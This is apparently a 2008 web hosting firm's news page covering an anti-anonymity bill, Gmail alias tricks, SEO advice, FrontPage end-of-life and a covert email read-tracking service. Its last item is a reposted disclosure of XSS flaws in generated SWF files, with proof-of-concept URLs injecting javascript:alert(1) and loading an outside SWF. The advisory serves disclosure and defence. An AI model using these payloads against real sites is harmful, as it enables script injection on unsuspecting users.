Articles

Barbara Sater-Glaze
WebServices/IT Consulting

Wednesday- September 08, 2010

Who's Online

Total Visitors: 2
Guests (2)

Main Menu

· Home
· About Us
· Contact Us
· Acceptable Use
· Banned Code
· Privacy Policy
· Terms Of Service
· System Maintenance

Resources

· Resource Links
· Download Links
· Test Internet Speed
· XCleaner Micro - Online
· WebMail Login

Articles (1-10 of 11 total entries)

Anonymous Posting to be made illegal?	News
Tuesday- March 11, 2008 @ 20:40:35 UTC	News

Kentucky Representative Tim Couch filed a bill this week to make anonymous posting online illegal.

The bill would require anyone who contributes to a website to register their real name, address and e-mail address with that site.

Their full name would be used anytime a comment is posted.

If the bill becomes law, the website operator would have to pay if someone was allowed to post anonymously on their site. The fine would be five-hundred dollars for a first offense and one-thousand dollars for each offense after that.

Representative Couch says he filed the bill in hopes of cutting down on online bullying. He says that has especially been a problem in his Eastern Kentucky district.

Action News 36 asked people what they thought about the bill.

Some said they felt it was a violation of First Amendment rights. Others say it is a good tool toward eliminating online harassment.

Represntative Couch says enforcing this bill if it became law would be a challenge.

Google Calendar Sync	News
Friday- March 07, 2008 @ 15:28:46 UTC	News

Google Calendar Sync allows you to sync events between Google Calendar and Microsoft Outlook Calendar. You'll be able to determine the direction of information flow, as well as the sync frequency. Staying on top of your Google Calendar and Microsoft Outlook Calendar events has never been easier!

Keep in mind that it's not possible to sync events on secondary calendars at this time. Google Calendar Sync will only sync events from your primary Google Calendar and your default Microsoft Outlook calendar.

Get started
To begin syncing, follow the steps below:

To download Google Calendar Sync, visit http://dl.google.com/googlecalendarsync/GoogleCalendarSync_Installer.exe

Once a dialog box appears, click "Save File." The download should open automatically. If it doesn't, manually open the download from your browser's download window.

Click "OK" to confirm that you're aware this is an executable file.

Read through the Google Calendar Sync Terms of Service, and click "I Agree."

Continue to follow through the Installation Options and click "Install" to finish the set-up process

FrontPage Server Extensions END OF LIFE	Announcements
Friday- February 29, 2008 @ 22:13:46 UTC	News

Dear Sater-Glaze Customer,

The following notification is ONLY for customers who are actively using Front Page Server Extensions. If you are using the FrontPage product in FTP publishing mode, this notice does NOT affect you.

If you are not sure whether you are using FrontPage Extensions with your site, please contact the developer or webmaster of your website and he/she should be able to tell you if this affects you.

END OF LIFE Notification: http://www.rtr.com/fpsupport/

We regret to inform you that Microsoft has discontinued FrontPage Server Extensions and its support for the software.

The official end of life was reached on June 30th 2006. Due to these circumstances, we will no longer support FrontPage extensions on our servers in the future and the program will no longer be available on your account after the next upgrade cycle.

It will still be available until at least March 31st for those who are currently using it in order to give you time to convert your website to not use FrontPage Server Extensions.

All existing FrontPage Server Extension webs will be disabled after this time and no longer supported.

FrontPage Server Extensions are programs that run on the web server to handle server side processing of components that are built into FrontPage, such as search forms, hit counters etc.

Q: Why can't I continue using the current version of FPSE?

A: FPSE has to be discontinued due to incompatibility issues. The manufacturer of FPSE no longer offers support for security fixes or enhancements to the software on new environments.

Q: What is the impact of the FPSE discontinuation?

A: Following the discontinuation of FPSE on Sater-Glaze servers, you can continue using FrontPage, but WITHOUT using the server extensions. If you are used to FrontPage for building your website and cannot do without it, then you still have the option to upload your site using FrontPage's built-in FTP client.

However, features which rely on FrontPage extensions will no longer work on Sater-Glaze Hosting servers. These features and functionalities include:

* Locking files so that only one author at a time can modify a page.
* Creating, deleting, and renaming webs and sub-webs
* Automatically updating hyperlinks when you rename files
* Automatically generating a list of hyperlinks
* Style Sheet links to multiple files
* Incorporating database access in a web
* Enabling other Microsoft Office 2000 applications to save directly to a Web server
* Hit Counters
* Registration form handler
* Search form
* Discussion form handler
* Confirmation Field

Q: What can I use instead of FrontPage?

If you wish to continue using a Microsoft product, Expressions Web is the new FrontPage replacement, using open web standards:

http://www.microsoft.com/expression/products/overview.aspx?key=web

There is a 30 day trial version available from Microsoft. Please note that Sater-Glaze Webservices does not recommend or endorse Expressions Web, we are merely noting this is the replacement product for FrontPage.

Please feel free to contact support if you have any questions.

Sater-Glaze Webservices

Getting A Good Google Rank Is Harder Than You Migh	News
Friday- February 29, 2008 @ 19:32:22 UTC	Search Engine

Often times people think that if they register a domain and put a web site up, they will automatically appear on the first page of any search engine results. This, unfortunately, is not true. There is quite a bit of work that goes into making your domain appear at the top of search engine lists, it is, in some respects, a science. Whether you’re just putting up a new site, or you want to elevate the rankings of your current one, it’s hard to know where to start. Here are some simple ways you can boost your search engine results in a few easy steps.

The search engine that I’ll be using for this example is Google. It is the one that we get asked about, and is the best recognized and most used search engine out there today. If you attempt to get yourself listed on any search engine, Google is usually the one you want to concentrate on, it contains about a billion indexed pages and your search results are presented in a clean manner ranked by relevance. It doesn’t throw pop-up ads at you, and when you search for ‘monkey falling out of a tree’, you get just that – all 224 000 pages (who knew there were so many clumsy monkeys out there).

Google has become much more than a search engine, it’s managed to wiggle its way into our daily lexicon. Ten years ago if somebody was asking you for information and you suggested that they Google it, you probably would have gotten a rather puzzled look. These days people are more apt to hit Google first instead of asking you if you know the average temperature in Iceland in July (which according to Google, is 10-12°C).

Now before we go into Google rankings, there are a few things that you need to keep in mind. Everybody out there is trying to get ranked #1 on Google, not just you. There is plenty of competition, and there are people out there that make careers out of getting top ranks on Google. It’s a full time job, and if you think you can be ranked numero uno on Google (with the exception of very obscure topics, think three legged platypus attends mammal/reptile crossover convention level of obscure) with little or no effort you are unfortunately several left turns away from being only slightly off base.

What you need to do first, is request a visit from the Google robot, or bot for short. The Googlebot crawls the Internet indexing web pages for the search engine.

The Google Robot
You can request a Google robot visit at www.google.com/addurl. The robot will browse your site and index its contents. Please note that this won’t happen overnight, it may take a few weeks for your website to get indexed. Also, make sure to remember to list your site at www.dmoz.org. This is Google’s web directory and, coupled with the Googlebot, an important source of the Google application programming interface, which is a source code interface that an operating system or library provides to support requests for services to be made of it by programs.

Keywords Keywords Keywords
It’s important to select relevant keywords, it is also important to mention them often. There are several services that allow you to enter in a keyword, and it returns results based on what terms containing your keyword other people have searched for recently. Below is an example of the top five results from inventory.overature.com, searching on the term ‘bicycle’. These sort of tools will allow you to plan and structure your keywords according to popularity.

Page Rank
Page rank is basically a score given to your page from one to ten, one being bad and ten being good. The lower ranked your page, the less likely you will be to appear at the top of the search rankings. If you want to do a quick check of your page rank, there are many available tools out there. I did a Google (surprise, surprise) search and found the following which is pretty simple to use, type in your domain name and away you go. http://www.prchecker.info/check_page_rank.php

When formatting your web site keep in mind that Googlebot does not recognize frames, so to get ranked you’ll need to make sure your site is properly formatted and written in a standard programming language. Googlebot will also skip over flash action scripting so avoid creating your site using only flash, no matter how cool it looks or how impressed you think your friends will be with the ‘l33tness’ of your skillz….

Also keep in mind that the Googlebot likes pages that are frequently updated and those that are registered for a longer term (ie: a 5 year domain registration as opposed to a 1 year domain registration term)

No BS! (Being Sneaky that is…)
If you think you can be smart and do things like listing a huge long block of keywords in the same colour as your background so that people don’t see it but Googlebot will, don’t bother. The Googlebot will ignore tricks like that. Linkfarms are also highly frowned upon and Google will usually put a 30 day block (search engine) on your site, with the possibility of being removed from the rankings for good.

I know that this is probably a lot of information to take in, especially when most people think that getting top ranked at Google simply requires a domain name and a web site. I wish it was that easy, but it’s not. Just keep in mind these tips offered up, do some research on your own (may I suggest an excellent starting point being Google itself) and you should be well on your way to climbing up in the dog eat dog world of Google rankings.

Get A Read Receipt When Friends Open Your Email Me	News
Tuesday- February 26, 2008 @ 20:41:21 UTC	News

If you are using Microsoft Outlook with Exchange Server, you can easily request read receipts and get notified when your email is opened by the recipient(s).

As such a tracking feature in not available in web email like Gmail, Yahoo! Mail or the new Windows Live Hotmail, here’s an extremely effective and free solution that works with every email program.

The service is called SpyPig (http://www.spypig.com/)and it will instantly send you a notification when your email is read by the recipient. The read receipt will also have other details like the IP address of the recipient and the exactly number of times he or she read your email.

Using SpyPig is simple - type your email address (where you wish to receive the notification) and they’ll give you a small tracking graphic that you have to embed in your outgoing Gmail message via a simple drag-n-drop (just like the Gmail Smileys). That’s it.

Now if you are worried about sharing your email address , read our previous email read receipt hack that shows you how to construct your own SpyPig kind of solution using Google Analytics or Statcounter.

The SpyPig trick however works only with Rich Text or HTML email, not plain text.

All Gmail Users Are Given Two Separate Email Addre	News
Tuesday- February 26, 2008 @ 15:50:56 UTC	News

You probably know how to create multiple email aliases in Gmail by adding the plus symbol and dots to your Gmail username but there’s something more interesting.

When you create a Gmail account, you actually get two email addresses - one is the regular @gmail.com while the second email address has @googlemail.com in the domain.

That means if your email address in Gmail is something like billgates@gmail.com, all email messages that are sent to billgates@googlemail.com will also be delivered to your own Gmail account. That’s two for the price of one.

Like the Gmail plus trick, you can take advantage of these two domains so that less spam reaches your Gmail Inbox.

Give the @googlemail.com address to your close contacts (put that in the visiting card) while keep the @gmail.com address for public (put it on your blog). Then set a Gmail filter such that all email messages with @googlemail.com in the header go a special folder so you will never miss important email from close friends.

GMail Easter Eggs: Dot Blindess & Email Aliases	News
Tuesday- February 26, 2008 @ 15:42:36 UTC	News

Here are two unexplored features in GMail that will can make your Gmail inbox spam proof.

You can then comfortably share your gmail email address on websites, mailing lists and forums without ever worrying about spam or solving CAPTCHAs.

Gmail Easter Egg 1: GMail allows email aliases and unlike Yahoo mail which lets you create just one extra email alias, GMail lets you create infinite number of aliases.

An email sent to paris.hilton@gmail.com or paris.hilton+fans@gmail.com or paris.hilton+blog@gmail.com will all be redirected to one common email address and that is paris.hilton@gmail.com.

Gmail does not recognize characters after the PLUS symbol but the gmail search filter can distinguish between the different address and you can therefore redirect these email to separats gmail folders or apply different labels.

So all emails with the TO: address as paris.hilton+blog@gmail.com [coming from her blog readers] can be automatically redirected to a blog folder in gmail and she can safely trash them when her inbox is approaching the 2 GB limit.

Gmail Easter Egg 2: Gmail cannot recognize dots or periods in email addresses or the user names - that means an address like paris.hilton@gmail.com is the same as paris.hi.lton@gmail.com or paris...hilton@gmail.com.

This is actually a bug than a feature but you can again exploit it to have different kind of email address in your forum signatures.

Keep in mind that hyphens (-) and underscores (_) can't be used in a Gmail address. Also, gmail user names are case insensitive, so it doesn't matter if you enter upper case or lower case letters.

Gmail Flaw Drives Domain Dupe	News
Monday- January 07, 2008 @ 16:17:08 UTC	Domains

by Brandon Dimmel
Infopackets Gazette
Senior Editor

Own a blog? Like your domain name? Granted, it's hard to believe anyone would really want the first and last name of the average American for a domain, but that's exactly what happened to David Airey and davidairey.com. Hackers recently fudged a domain transfer on Airey's behalf, and then
demanded a ransom for its return.

Airey is a web designer and, like many in the tech biz, takes ...

online:

http://go.infopackets.com/e20080107-14

Can a Guy Named Jimmy Wales Kill Google?	News
Monday- January 07, 2008 @ 16:10:14 UTC	Search Engine

by Kurt D. Lynn
Infopackets Gazette
Infopackets Contributor

Along comes Jimmy Wales with a $4 million (not billion) investment from Bessemer Ventures, an investment from Amazon of an undisclosed amount, and some private money from a handful of angel investors that include Marc Andreesen (cofounder of Netscape), Josh Kopelman (Half.com), Mitch Kapor (Lotus), and Ron Conway (an early investor in Google, PayPal and Ask Jeeves). And while no one knows the ...

online:

http://go.infopackets.com/e20080107-10

XSS Vulnerabilities in Common Shockwave Flash File	News
Thursday- January 03, 2008 @ 16:20:05 UTC	Security

Critical vulnerabilities exist in a large number of widely used web authoring tools that automatically generate Shockwave Flash (SWF) files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) connect (tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and Techsmith Camtasia. The flaws render websites that host these generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular service provider, used a vulnerable controller SWF in many of their projects.

Simple Google hacking queries reveal that hundreds of thousands of SWFs are vulnerable on the Internet, and a considerable percentage of major Internet sites are affected. We are only reporting XSS vulnerabilities that have been fixed by the vendors.

DETAILS

Many web authoring tools that automatically generate SWFs insert identical and vulnerable ActionScript into all saved SWFs or necessary controller SWFs (think of tools that "save as SWF", "export to SWF", etc.). The vulnerable ActionScript can used by attackers to execute arbitrary JavaScript in the security domain of the website hosting the SWF.

We were unable to perform an exhaustive review of all authoring tools that generate SWFs. More XSS issues may exist in the products listed below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the vendors. There are more products vulnerable. We will publish more information when the vendor releases fixes.

Adobe Dreamweaver The "skinName" parameter is accepted by all Flash files produced by the "Insert Flash Video" feature. "skinName" can be used to force victims to load of arbitrary URLs including the "asfunction" protocol handler:
http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the December Flash player release.

Adobe Acrobat Connect/Macromedia
Dreamweaver "main.swf" is the controller file in all Connect/Breeze online presentations. This SWF does not properly validate the "baseurl" parameter; thus causing script injection:
http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the December Flash player release.

InfoSoft FusionCharts
One of the issues found in FusionCharts was that the "dataURL" parameter allows insertion of arbitrary HTML into a "TextArea" instance. This allows attackers to load SWFs from other domains:
http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we found were released in late September. Webmasters should consult InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia
One of the issues found in Camtasia was that the "csPreloader" parameter loads an arbitrary flash file:
http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues was released late September. Webmasters should contact Techsmith to properly upgrade their SWFs. See "The Fix" for details.

Autodemo
Autodemo is a service provider, not an authoring tool. However, like authoring tools they use a common control file in many demos. The "onend" parameter in "control.swf" loads arbitrary URLs including the JavaScript protocol handler:
http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely responsive to our report and quickly fixed the issue in early September. Webmasters must update to the latest "control.swf". See "The Fix" for details.

Autodemo is not the only service provider to have XSS in their products. They are just the only service provider we looked at. Readers should be concerned about other service providers who don't even know their SWFs are vulnerable.

The Fix

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.

Barbara Sater-Glaze, 10 Freymuth Rd., Lake Saint Louis, MO, 63367
Phone: 815-669-3977 Fax: 866-459-9740
Email webmaster@phpcoin.com with questions or comments about this site